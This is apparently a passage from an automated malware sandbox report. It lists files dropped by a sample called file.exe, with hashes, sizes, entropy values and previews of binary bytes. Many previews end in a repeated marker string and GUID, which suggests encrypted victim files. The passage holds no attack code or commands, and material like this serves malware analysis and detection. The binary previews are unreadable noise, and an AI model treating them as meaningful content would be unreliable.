          SHA-512:2A677F031D418D9C007E274CACDCA078B16DB324F5AB5AEFB863DB6CD5C4FA0B4E4BDA0E135DBE6E9DD420E18626E985F7A4AED9684E64C1F92B305A4206765A
          Malicious:false
          Preview:{.. j.........%d._..Fg...N?....J48WFO.5Tuc..4T.w..6.....j......&....^.......4.k..Fhj....D.^..e.kb'ks3.r......G. S.JW..Y...*.[b.p.&oq..z.+.\......?mS..{..u.....h.8...v....kX..Ysw..>/...A....y._......E.l9.Y.{V.N.W.:....}.p.E.wxRdt.|.._2^hpUW.;.._.Jw.W2...v.n.TZ.. .Vb....7..........WQ.;?..@`D..{....Z..wN..W5(.y..f.O\..}Yuj.v.rD.^.]g'...TB..nYlA..:.B.C.l.r.........Tr7n..y.].O............iS.j..b*r7...-.n....\...rb....G...J...U/..]..Y..q..6.s...?....o.j...Y.T...].H....Z..(....;)...W..S1".5..%S^.i... +..C...d..P...h6...K.72........TjwC....u.L).^'.I...d.....e...J.R..hcX.c..j.....{].Q. N4.br..N.f.W.7.z._.I..M..:.......|...g...."..7.]m...B...=.C.......M..w.1<e...:.;..(..+F....q..w..P6.=...._..J*..c.08+.Fa.......&.;....].G.s.....A.....5...]....p....g(..z.5.$l....../S.ji.5'...X..2...2......-..dW....-....u...?a.,..LWe.w..zvn.../u.d...y..t..&..J.;BA..G.h..\....... d....e.h:...!.rScw.....N..d.2..U.,....y+.'.&.>.........-1....`fI.)..pZ.o.....v.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):625
          Entropy (8bit):7.600343883520422
          Encrypted:false
          SSDEEP:12:2jbmGqm1F+WIyKS4uMa6U+VQDyb+VyXo+zPJusQ2ixpZacii9a:2jbsmr1IyKS9aU+VQDM+VyXo+zvDiTkX
          MD5:418929343065B86D5041ADF5B18B42EF
          SHA1:B20148684653E042AA9CA3391E3B4B651D30303B
          SHA-256:5D8096AA0D74F14EECFC33F01A9DB8AFE2C9DDCC68D551A5EA1FC58D1ABAB5DD
          SHA-512:DC5D2DBA2DDCC1441E77723454862143BCAFDA1F0FC8316CB068284226957F8A33C0FF336CDB8AD7C0A2C2E53446BC1CBCE966D39B2E56C716A1F7E38CE54645
          Malicious:false
          Preview:(func.~R.).........]4a......6.f...u..Q.....+...c..........<...4...11.w..B..pUR....+....G`............b....}W<..j.....O~}..]..\)....^..N ...5....Y;..t.m..3F....f.;...\....}.7,.7........^.,....`/....3...l3.....l..^....T....A...S....24....i......z/#.P2O8..'U.P.?da".8eA..#..-}r.$U..x]...K.....tC.H!..EtQ.p1.N.mK...C.}..6U.V.#..\....r..;Q].....p.q0]...6E6.Sa....o.....(.Z..Gc.....^mr..l......$*,3..L...C.D...........Io...u....O..F.N..Z.55.a.....u.+%S.`....%4>.Z..tt..p,.~.....o........=........T.;.(X.... .a..i..f.^..3..dQ....}r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):763
          Entropy (8bit):7.70613448194872
          Encrypted:false
          SSDEEP:12:YKSelk+Ffc41nZ/syMiSb2ZxKqsVG1flRGUby3L8nYCs1p/aixpZacii9a:YKd1xc+nZ/sZ1bkGGZlRVcL8vqaiTkbD
          MD5:97C3E5B1E42BFF23A07E385C28BBE2F1
          SHA1:CF39286DD8872CD9852349348282347AB84DF930
          SHA-256:D07155636F8627BBF490655C0DED54F8A4D11CD778F5D5E3FBCD21BFFCB6C86F
          SHA-512:EB249BAEA19AB41F0EF55137ECC321ADD7CB24F6E577D783832913AEADAB93C6AA5B6547178A98989FD12A18033BD6D257A11AFA733BAFBEF770E5801359C09F
          Malicious:false
          Preview:{"filP..9......Q..H....-.o.uuj...=1Ve.T..h!.t#L.B....).'OQ}...L.........d.;.......g.......K.._...S..U.@P...n`.. .. v%..A..\.n*.i...V.E#4.....9Ya<...5..J.. 7...0.Z..]K...E-!.....Ui.Y'..#~....g.Da....2...7..fW.ha..>!".t....0..5{%..oPB.o.....%...3\z[>..0F.wB...'....4..3....I..W9Gd...A..N.2.R.U./....T...xQ!.o...O.4..xd.....f...|..C.......ys-...7|.e....6.../..4D.B..by.....^$...MwQ)...{.......@.{.NS..T....N%.QO......{*L<A.........._.F.'....=....."._@X.....B....S.|.8.9}..n..%.qi.7..p|..G.PJ..Q.!".W.....=c.t...u]....qO...\..j...9.j,.g.BI.......o..Bw!...1...<.9...^..(P.O...?...;....a..\....y.^...9.+..:...M.$7.{Hqt.W.?.n.y.u....I."..o..h..7}.M..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):2087
          Entropy (8bit):7.895268404113114
          Encrypted:false
          SSDEEP:48:o4BbNoTyzH/AizbypUcW3OoYHK0LgiJaIqBFc0vziD:PqaENzMEgiJaIqc8m
          MD5:0D934896D66BF5C54BFFF309A703CDEA
          SHA1:742409CCD1A606B63E1DEA9D12E078619C221DA5
          SHA-256:B6EA74953B5F700BDC171BD4C4764CD660B6F4FA965C5A09B81C6A7B300E5000
          SHA-512:DC3E189CD1BD3A107EAB43429087BC64C2FCBC5E51EC3069F18BA2195DD08C72822CA142A01AA6EE8EAAAE4509DD6763971D38EC64A7DEEF9F29E595C129A11D
          Malicious:false
          Preview:[.. ./.AK.K.(T.-5.YH.z..4S.!...0...C[I...=.B.Y.a....N.8..>.7/.=.k.+l#......W..[......B...*...d.g}..._..\.......i.].T..Q..N.d.....k.%.3a5U...T....v*n..^(.J...s.2..i2*O...i.Q|!.6...ZMO.2yy...8.c..^w.R..4r...r...._E#3.8...px....V....YA....v.qs.B.....j^j.......r..J].k*Y.7.Q...W....d.....IH..&.K@o.....-)...y.m.,..-0`.......f.{..2.`..a.O...a..e.7'!.<Z.l..i..^B....R...Un.a...m.)..:1O20...I..RC}..%..t*p.H.?.O...5.m..>...%L.z..ND...*:b.q...;\s.'v...>t.......Vn.dQ..<C.4....&...D...^Ed....Zf....`.@...~..a.3..U. ...?...._g.i.r.s8RN.R.#..1..Z`....N...."..y...7...Mh8%.............@.'\.1.....3.......B..M.QDn-b..}........ .V.G.id...m3...x.tN..p<..2,nJ...fwC.S...PA.8.EzsiV......sp..B.q...t..T~......[.....n....N.W...(.O....=+8N...$1...;..o-....b..u..3?+....;s...H....e$Hh....\.X...kF.S...........3L..Fm#...#..)....Rp.....<.VE..6...h+W....?#..[...ng.ox..xs..qTj........DI......2.y..~..(.0<..+:....*F0....TRZ..;.Tq.`..8.M.9q.D.@..uTJ..IR"vVH.u.Z...S...;...M.P.
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):9751
          Entropy (8bit):7.978753970216449
          Encrypted:false
          SSDEEP:192:yTKkA4XF8gL2qLPObhN+cdNS4BHocC1eo2S5KWmrb7/+3gY:DkA4XCPdNSGnzo2S5KJbD+wY
          MD5:B9412A8EF0F8DEC0E8F2987C429EF454
          SHA1:E83E314036CA60C1208338BF5223A3CB01DBAFB2
          SHA-256:40E6B2DF01494606BB911BE4C6DBC172A4BA465861EFB796207A35549B05F579
          SHA-512:9E6BB6A13C7298A5FECEE072F3C521D164308E96B7AD226E92C4C71DD13B1327840D30169A05C5727BE8BBCB45F479108A139F22ABAEFA779D156CF815A9AACD
          Malicious:false
          Preview:(()=>...`p.I..>...1.'.....;.!.5.Z.|<./.p{......f.H..STU....[=.5.(.Umo.w5...SLAs...k...h.<./q".4`.$......g.q.".%.....(.2........LG..)...H...d^w.....=.1..xS... ..gP\..n[A...;.w........x.....y.v.@.N..J....E..=On%..3..N./Ak.C..:..._+..t5...7lXf.u=.8.p~.|..8I.?.V.y...H...[\...9Os....`.....&-T.kc.B.WN..}id.I.Y.>7...r...n-g.9..n.@D0..K.qBa/m........U.c0.{...<.B..9..G.lx..k..Q..0|.x..go.a.o...4^..c....... .m.. ...jE.x.......Y..,........6x(......j...O..N.......=.ox....#{...E".8.....?6..t!.u.2X.(...[.....r.FNE.E.fO..VB.d/.O:....L).la..V|..}..O.T.-.f..7..f{%..m.....)....Ss2...V."..wD.Gbq.8.&...xq...v.x.....b....u...f.j(.nm...cv"?.su..F..$.............s.dW.\..6...r!..;O5y.R..u........, 6..|.6.B...|..8....s..'4.....j..~..D..9).......r...k...x.et..6.2..T!\20..n..J./.........W.V.b.l..Sff.L..)L...........,.&.r:u.,...d......].......j)xyd..2.. ..+..]..w......8D...j.1.6b...i..n..;.y.....b#...N..>..0L3...o4...>?Q..O.F.~Q...[..g)S"..y...o.l.7_.S.....B..9.`.z.Jq..L=,
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):10104
          Entropy (8bit):7.984448761232313
          Encrypted:false
          SSDEEP:192:V2kSfj8grLEsvqd0s8mT3O6XK4vxjHmCQ11bIJGfF8MDOpG023a:CYgrBCdRj+hcxaCC1BKYa
          MD5:BB3FEB92C260E58184A72C52E47D23A6
          SHA1:1CA24AC9CCD48F07E49EC471CA0B51119EDAB338
          SHA-256:B819FBD4F3EF9BE74CBA6DFA468B031187E91009FDC482788B305883B1FB2C18
          SHA-512:F0F44CA520C9007E2A5F4464F64DD4A1B1D29E07926595B4B902D67DC1896D0C482F94D56AE0B308A57D3C4DF6A8B9DBE470352510BF57B5ED0DFE6676C28544
          Malicious:false
          Preview:(()=>I0....W..R...\o#.......=.}<4..H..qW.WVwo..f.....[?x&.......p[6..H.1L.1..w0Z..?..XY....q..W0..b..}]\...U>.s.>.)1......RY....r.."..p.:\.....|.]...r..2.E.k..;...G....;..;....I}M..(...{..k).o...bs.Y..........x{.n.:#..~.u...:.7.+...`..i.ls.....L.x.eG4......xD.x+...]....[...^...u.c..o....IcD...Y........<...#...8......W\.....<...........PsAx...N..._.J.z./..%.......3......CQS.SbjM..A&.v..........Lq..C.7Z..g.j..luE=...B..9.kgO.H.XJ......1....R...9..]..x.L.............4F..~.QE\Wo..7.....T..m.^.+......P..Wb..}R...{...|K..-..E..!..I.nV.. o.....}..n...."V."u..cI...3.-.......K..R..".r..fq.h..scC.*..m!*..'..v.`.~R...>E.Os.%.>....|.rq.b].c....*..'|(3.-..nZn*6...v#.. .vB....|....>..0./..$........a.xY.F.1........c6....x.BA..(.X%5......Y....,7.^..I.6&.E/c.....kK..x..W^x..7.^...qn.:..%.7......|k...D.t.a......v._Q...#.H..D.XM....ygR....{...."..X.Q.....X...L}..>.,Z.^...._.[.Z3....P.4.P..+.S.>.9".B.).r.{5.b..t.F.d=[........a..l.+.E`ZRJ%Z.l$
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1296
          Entropy (8bit):7.850720867853904
          Encrypted:false
          SSDEEP:24:vgNloBiOh1oYnb/0WLqGCw9ddbg7Se2F1LfoXyd/ZEFnL/NViTkbD:YMwOFbsWL5C0Pbg7STF1LfoXyBZEp5sq
          MD5:02F6F6365A2C97BF3C30AACAE2912621
          SHA1:3ACC34124952F6FA81A58DD7E241A8ED45CC7293
          SHA-256:2889FB20FF64923C76F0B7F02CFEE036B3116446BF3210F079AD2DFC8AFB94E7
          SHA-512:4671186576020FDA1FB984707DF223B25AE2C8FC1C73590CB928950F750A267843CB86B52BC1E13ECF16D891E09B6C5C6DF85126B1DDDE2BB8C3EED553C0FD04
          Malicious:false
          Preview:{.. .(j8!.>..7s.(,.H}.#...E..C..<..EkD........Aw6.c..;9.mP.Cm..h....:..Y.....9'"..#........._|?.H..BSP.=..J.....!8........)*.'..7.VO.o<.......G...`n.t.....s5WO..+)....E8z.-.....An=..u.....;..p.Z]......-..-......~...V ...}..[....R.C[?.&.....{.z..&J...U..tF)[l.qGt.R+.........io.I..WL......I....).E...p..q.....K.Q.....?.D..2......jky+......W..&...c.../Ox.`...f..M...+..b#.....6...K....J...K.......TJ..j...R....s...[*/.#Y.?b.....QN.6.>U....S.(.L.j^..Jy..C`....h.. ...B..P....W<.#......PK....Wh.e?.r.y./ho.{....!s...[WM.v..99@C.$.B*...h.M.D.Q..Dl{0..y...7..%......6N.....i....4.Q%...2..JVA70........kZ.3.>.....P.~pJ......0.....%...P......Z= r...t.iI.ik....!..g...-c.1...X.`.z\...6..o.$b8....y...)s.[u.W.q.&.)F.......Mk.....D.ZQ..W.n.....D..aAV....2,..Z.....A....$..N..Ww.:...BP.e1.w....e.Q..`....+Ct..<...`...3f...z.7r%...9...H...'.3.;:.I.D......o..Q*!B..r~^.....x.}^WK"....FN..aQ!U...Ibp..!\Z....N..P....3......FNr....G^.I...2..y..q0........Q....z4
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):674
          Entropy (8bit):7.682493337107879
          Encrypted:false
          SSDEEP:12:kCJ4EA+/OnQgrFZP9yHVqb7Hu2CGf+aePHC58kaU7bQmDssKbmOCa7ixpZacii9a:F1AwqthZVy1q/2G2PHAdfQmDst6OjiTW
          MD5:F45601B07EF83C395E0529A5586A0AA1
          SHA1:7EA7A570F58BC86068B2B16CD980240181CA4D05
          SHA-256:D43084A3C403726C3D6958692E79021E344B3A80D141DDA4BB1703F45B98BDF3
          SHA-512:9F297379BBD90F6DB628328BB881D2EE07EF15A08CE3E9D675E7F6C616FA4AF9BFEE88E1D694B3CBD819DED14F45710A78146C931F33326F3BEC8A5646841F3F
          Malicious:false
          Preview:2023/.`..e.a..t.....t.3*h4D.q.\..71.fz..L.4Z+.7".%....b`l'.........|.g..&...k...O....K....H....s0z...AY.DZ..D...!2Z..Q...m...-..s....$T.f...Y....)V...!m...6..b.OO.......skjY.J"....YW..7.~.F%$i..&..0L.....f...o.N-.:v.z.......V?.M[a?.W.X..}+.l=.....-..d\q...C...$.&.;.:..^..c.._..u.s..m..J........`k.1...O..?..O.4.C./]..r..<.X..;{...uZo..b."....$.X.(..!.w....<..d. .N..m.~..W..+...Q..H.L.c.i...h...!....j...hK$..-...z._.3[....N.m....v.._....}.|..?.>I6.@.g.s2...G ].#...J.C.....R.:......W..."...s,.s}*e.....P\....!Y...C..u..#....._uE.{N.G....;..us&.1u.O..0....V..x...-.}\.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):452
          Entropy (8bit):7.445168647573611
          Encrypted:false
          SSDEEP:12:S+ne2n0RdsB+YR2i0Kb5MSv+Hq+G/ym/tcixpZacii9a:jneA0prKb+Sv+K+GamFciTkbD
          MD5:D18A59B624CF456A7473D8387566612C
          SHA1:17746471030FB7DC2F33C4F7A154FC875338EB88
          SHA-256:A0B1433BA7B21E2DB6C7F561E8F35F8EFF834FB57424A535440D0B5F6E476BBB
          SHA-512:AE0DF6EBCDB8443AC2EB4FF1ED1FA8067F6CDDD51FD17653867F08631838CBA7A429E3CE2057D5648E07408A0F3F0907A320DAF9C4CFE22A550C395727814551
          Malicious:false
          Preview:*...#LJ......W.&b>e ..N..c...F^..i8q.B..Gi=..f._fl...m.{...<c.....r.dX...>L...h..[GE....TE..}=...>...lqq..'.j~..1.....j....LK1;H.B]..}....>...L.......?.W..._.n.\.\;.*..z.n9........c........< .Iwi......6.k....$..(.o...U....~c.jm..4.<.7.O..*.Z..c..S.....u....c.i.....>.i^......sG`S...8r('....5.iH.r.6#.fn...#7...v.Rn.YPT.....#.S@.!M.oTHA.4{&.;$>..........B.E......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):374
          Entropy (8bit):7.307147245153721
          Encrypted:false
          SSDEEP:6:16KhfNuTzO/BgvbprZm8p3Cgwgg32x67OtGxjUKZGRdhpsIc2HzjGxssZacii96Z:ftNu3igVlQgwgJ6S44kEQUzixpZaciik
          MD5:1C3D9FDA208C45160F3800E50EBAA59A
          SHA1:0327270632883D89F46163E86928228DE065FA3C
          SHA-256:901D08E1418098C7F3C2F453522BFEBB077FE11CB3BA36036607AB0EC71B81BD
          SHA-512:2A12E651F2CF876B8707AD7042D9DAA20D94D39C85A04F842C64681BC16114182BF6BFE8139F627E0FC1D014C3F08DE4D5A36AF87C2E2F956422031E26862805
          Malicious:false
          Preview:.On.!......B.o..n...E.0W{........nYdD1_;.:G.......G.XCO.l&.!.....a.b[.........?.-.m........H....._.V-..HDi.....o.g&.....]+..l....I.F...C.O.......W...+..[h.*..#...f....O<...........w. x.e.0...D2..QhiX.FD.....M.W..o...e..mm....}w.<.......%.fD..`3%..|.)7'0]X.q ...A.7.J......B.......2"....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):690
          Entropy (8bit):7.642187876415583
          Encrypted:false
          SSDEEP:12:k3bBoDEt49cMewjH/GAvHReNDtKRsC2PTR7Ay8MfYWKF8wQkMU9VixpZacii9a:Y12N9jJfGAIEsC2PTRR8Mw6wViTkbD
          MD5:A0A735473116B125FFC2A11987827D7D
          SHA1:3FA8F4029299FE4923AB6D1D22A88316CC8E63FD
          SHA-256:9DA9455FA4384F2569EA40412CF3806ED86995FCBCBD78D6B5F6EC4262EE7662
          SHA-512:28636F6DE3943C1984C38A142A1905A01E091682C16932B0A1381087D2F8B2AE155DEC471AD7191BE8442551535B08F1FF39A11AB7C071A7C675DDDB395D2B3F
          Malicious:false
          Preview:2023/.@t@.<.%.q..T..I.=_L...U.=.W>h=2........2.......p...|t....n.......Q.....5...a..*..k.V..........iQ.k`H..5.t..u.......}..S......tn....}hkO..>...Ym..j..4..o...x..XI./....../.L...r../.......~.......=EQR.P...-..a=...G.r.X...L.d..(<.g..`XT...pK2...n#.8....!...b./..+......q\.!..^M`.|C.5N\..........g.nn.C."..\.....LP....\.Q.J?..e..$..6.f#...Ub.?..._....08.....P..]\='.......>.......)S.9#.!~.......~......SP...!?........Y...?.l...Q..LS.....T7...*..Z.S.k.5..<....<...D..t.u.",.n}..`...b.....z4....@a4.....*>f.~...../......~..F.....VZ...i...`t..u.1..S.ZP.P.E...g.L.\..A...).2.P.xAtr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):380
          Entropy (8bit):7.341540453058959
          Encrypted:false
          SSDEEP:6:qexkoGZVdHjx2I6xRRAJ4nXIz9hQ3iIrVZySwS1v88fEuN2q3VjGxssZacii96Z:SRHB12IVJi443iIrV0SwaNBixpZaciik
          MD5:81C2C448B2E17569345902AFF2577FF7
          SHA1:72468F5CBDCAD4118979FB3D0AACBBC5BBA27CB9
          SHA-256:37C8B429969368F63D616B1F8E252E3A27CAB92287D8CC7DB394A1735EF9A0F9
          SHA-512:7274302C588344EAE8D279219FC6209C8A5C97497AC8B61C5820665D45ED9DCEB6F20619A9FC7F1A7E4ACF8A6A6C431CC5D6FE2795E504C0268563F81E2CDBD1
          Malicious:false
          Preview:...n'..w.......MO....|....?@.a~.c.zL..A...+....+<.j.1.k...C.......bg...Q....L..~V...72..$...F...q..|P....(.v77...e.y."......\....gk..S.7.V..w.-m..p..}5.Bq.HZ..G.)...P.0V.&{.;n..b....[....._ms,..M...2,.iEq.e..6|....<.sZ....eh|\.vTd..za..%...i.....q^.......=}S{.AE...H.^..^`..E.J.E.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):666
          Entropy (8bit):7.560649485030195
          Encrypted:false
          SSDEEP:12:kYNm3KcRYh8zhbK2GRG8Y1vyhlrvbU9yErcePDIifaYTXwLwNNixpZacii9a:hNLcyIK2kGn16lrjUoUbsiiYdNiTkbD
          MD5:705732E434A3A4C78E6835830916AE36
          SHA1:54EAD42DB1EFAE3A42742D52F096DBABDE3F5572
          SHA-256:824AE175B8E6554EFE77654A404701D51875C6B19131D11E36581DE32E67BFD8
          SHA-512:9895AC67D4709F0BE3DC03911D6D61EC32AA993BCFB311F206DC300346689FCF4D17CA5C201D2E526BC25AA2DF6B1C3B6FCDDA81D924C8C559765F9E0421AEDF
          Malicious:false
          Preview:2023/..j[@..H.....@L$....=>.]...@'x.......2.f...;./..~....7 =...iA~.e..T4s..?0.S0M.i...0.tz.SBB..<.~.;:...[H.&@.>A..*5..r4.._...B....x..."(...k.E%.w.%.b.._..x.U9....-W.nX...ETT...Wy..}=.Yr..w.-.3W..xX.#...z.&>1..o8...0......2$c...2..m._'Q.V.H;.W......--.....g9m....*.;.......|...6.#..n.H.>.EU.o..LIO.`.3.'.ex}.#....z~...IS..\m...0......c..kUH.08.*.-..v.4.8...C1...k,=L..S5.&x4@.E.'.$<&./..=2......E.Y...=..._.p.@T[zKy#..R.'z^.S...M.l......9..n~.(.....m....@5.n........v1}K.K....t?G...P,s......}.{.3,.=qW..2..|N.....D.,_....n..L.SHx.G..bh..g~*..1.G}..I.../..}.:..D..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):850
          Entropy (8bit):7.702157033872426
          Encrypted:false
          SSDEEP:24:BTG7wjAhsxKar+hxYOwDkWtItXJw83Jjo1XDliTkbD:BTGmbGhxYLkWtIZJ9JM1zciD
          MD5:21F1FF44BCD06B7BAE6D81F173916B0E
          SHA1:1716985CC52DA9952FE218C4175BBDF20AB582E1
          SHA-256:F2CE599C74F2163E085B0C9A40B8120791E42B0CA5EBAE6CB0C895CCA48991AC
          SHA-512:9251198F914864D6D8ECA924305D643DAD0AB8D291D8617256B0A4CEE6C5D180468384953F7D73BD679763467DAAF42E00445F88F6A9C3543D7E35052E989570
          Malicious:false
          Preview:A..r..p-i...9.+.....Z2n$}%4....F..nc-.}.dS..|.`l.e%.......YM.$.B.m..y.h>.:..gA5..U.0.....#._U.}..-b.z~...i......Jb.7....VV...*r..............H..fV>...^.....=.Q..&76y.X.......,g...sNO._8.........c......W~..u-..../^Ua.....m..4.r....W..k.....d...N'+.s.i.O.~.iK..\.u&..t...k.Y.S.D..p.Q.N.q.Uk.....swU...L.......L8.....B..>.7Y.fUe^..*..Z...M&.h..X.'....2|...mGF.`^....F.I.k..... r.4x..Zq....0'Bk.as...F(...1 .'..wu}.......jH....T..Z.....S@..z.FU...LUu.....'.V#H..%../.[....\.!........B..:"....ah..2.-.....%..'x~?k.Z..2.'...%..?B.B8.~9'....?.b.....Fb8....H..J..3j........U}X....Z...y..LO....8...{hh...+/.M>.2*..B....h."a..n...=.'..m<rm.mc.F/.#n........+.^.[.X..........h}.y..&.X8....>3I.s.....5.)..^.......).@.:..#..1..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):662
          Entropy (8bit):7.6359992345734
          Encrypted:false
          SSDEEP:12:kgkAwl1yn7t34C4Axvt0CON8D/fSPXTZnZlx0nwNeH+GAz+6pixpZacii9a:DkAw/s7toCvaC+nPzxNeHezjiTkbD
          MD5:06EF8CBCCBF5291C11A845AB3546A60B
          SHA1:4A3ADBB69503F74CDC8BD4BB6E8ABE93E4DEF70B
          SHA-256:4D0CED3F28A619BBCCEF261739C1B2002A86EF86D71CEA1577EDE67B1E8B4153
          SHA-512:06CD64616282EF5D5946DC1CE5D067402D61524BD89CEDFF782105A8B502B8213F87B9B99093650586BA6CF489F8E802264E5958E6B9405CB9117B547E4F0B3E
          Malicious:false
          Preview:2023/.X.P...*.hL...v.:.g2..Y.$.;u.k.W_...V?..5.HR...U..f.eK.(..t.{...$...4..-........U%k.^._.ez=4.....@..y.Q>.n..a...O.....aJW..[.=.Q8?f.WW."..2.r%.".p..x.kQ......`..*:.J.......`...gS.O......fjy~s...`R.9..lWf.u.<...2gR..9....u.c..)..oU.G=@. 1p;.90.*P..W...m0....?t.PV....mK..D..l.{..Q..F.VqBW..C..|.X.S..a.<....@5].2..v../u#..~.O{........%.di8.e.,%..-d.r........j.)pI..IBd........g..?........v.6].u.C.......|.Z........__.D..8.3.k....;ug......z.qf.gF........8})x..Z[.42...BwXV...Z.n@.S=..2L~....w+)...OM..^..=.<.o..'..0.cD..;....v. ....[.*...e...}....V...1{M.qr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1116
          Entropy (8bit):7.77206534604191
          Encrypted:false
          SSDEEP:24:G0km1LPr7OlD8sgVU9rNAgdDJwxapvPyDRH/qEUS5cyFCiTkbD:H51Dr7LVUBqsS5c23iD
          MD5:E195FAB1507BAF4197CE121D3E2DA284
          SHA1:0D977D66B14F8042BA01E68B6C0B45EE8B8FE756
          SHA-256:D40C19052EB117E3CE8A4528E36BF1019FDFEF7EFAC7B5065FC8AECFDBA09F20
          SHA-512:ECA6477D88627F89E38BB00B42EF3A37601B35BBEA1D9BF2A3717348C77BC601FFE9D400A60DD71B014F6DA4D00EF6580E144BE1684B6175DE30B34D1CA95CA7
          Malicious:false
          Preview:.h.6.#K..=..][F'..h.Y....W...$...A.8.i...<gmB..\...p..A.px.".....m.?W..1.....@Q.U.Ny......i.$..O....M......#..y...O.HwBk...1.E....Q;9%Km.c`u9...2...~.q&...m.........E......ar.;......<..k.n.x.c.6<.0b.[..\.[^.N=J..y.F.eUCi......8..h6iX./.[=w..7.}..f..(-.w..D..^?+if.tr."........-;.[m..C.I....@.r..H.....h[.U.#..Qifrz&...Y..Q.q..Nt*...J$....?(....)........pOQL,....,o.%^>$...)..D8..(...T..G........;...g_....}....F.9l...B$.N=q..-..p...qpE.......%....R...v........x.+.7..tr&.(X.&...d.....=.Q.(....oc.........!.>..o....FJKR<."A.mo.Y|...<.D(...4..D..MF......&.........6.{.[.-....b..iB.b...._e79..ys.z.....,...F...^.&......o.9..2d.F. z7..X8.[...@up.D'...| .#.?~...hZ...Qy.C-..a-.tv.?.."s!B.....Gi.v....o...k.jc".....K(.(0U".}-/5...u!...B2.......[.uJ..pc.o....!.W...J. x.{+/.~.\....F.~"..!._...w....7D....%D.....zA.&....?..c2.QG..\..hDa.i...~*+.C....#3..r.9.6.v.8....g0F;.J.Qn.}..GN8..E.!a....#C.s.q......a...W.....B.0WGo...ey.$....R#B.:....~..T...%..'^.lS
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):680
          Entropy (8bit):7.645696842354223
          Encrypted:false
          SSDEEP:12:kqq0V1za+2c2UJDRJoKLBUJkn8SGLgjfUoqDaRpN7zg5IHs5FJwgKj8R/ixpZacq:Zq0fzb52UJDRJVr8vgjfwu7UWHqIXj8P
          MD5:B86C78655F35A89F599D95B614DD5D54
          SHA1:6CBA063B9616BDFB2C8AE0899A5E209704D09FD6
          SHA-256:CE771FED2AF38304008657D8DCBD71F999C5EDBFFC36AAD6978B6C74854D44B1
          SHA-512:4C8E8006EBFB13C17F82A16489B1C75C68789DB613FA57800B356FE3734E02E6E8B77054523F270DD5CE05233EE69C6FBDCA03417537A1A404225188C621D827
          Malicious:false
          Preview:2023/..t.....D.{...[V.!..P.{.#....1.zo@.tUP?.jr.....lg$.|.....EP.O.[...+..:y......xq....}5..]...+.0Ix<"..78..;9..Y}..o6.K.....^....k|..Ra.>d.`....W.....w.E..;..v.S...=..'.Eu4lWY...@.z.h0ya.."..x.....(.U....]..........)_w..k.ke1...)_...-6.C.c....|.....b=.......})\u<....=6jB.....L2..TK.....GG[..!~.m.K._...i/..n...xa...g-..)...W.......|.4.b.S.[`!..LS.7.e..q.B..O.]..&.w.......xW.Tj.h.F..].....t....B.=.u?d.a..X2.L(...F.N..B.<n@T]..oK....?...X7&.....j3Z......~K.V7.0...^..|pORnZU.../z....[..YM.g...G(..g./N.......2/KrI........M....}'6.w.....s.o..I...b.h$.N.|...6...r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):80530
          Entropy (8bit):7.997554767160391
          Encrypted:true
          SSDEEP:1536:BwpRdWMwTTMKoCVAwlVZeinKfcIK1Op+Jsr7SKfd9WWXYfP4:4RKPVAIZKfLmiGsr7SKlAI
          MD5:AA9F2321FFC54D85C5EC840D57670E53
          SHA1:029110F8F3E9AB39DF39FC6E670F24F5375EB45D
          SHA-256:4C789284D7A49358E47F048EAF642E7D8EF63205A25C2ED46E81B61EF5E3FED0
          SHA-512:6730590C6B00F368F36D04259F93DDF33458D34F5C02D4708BEFAAD1205D8B21BE67C4BD1AE7C085A2AD45914F419699372D0671E8A97984569769E5EB715932
          Malicious:true
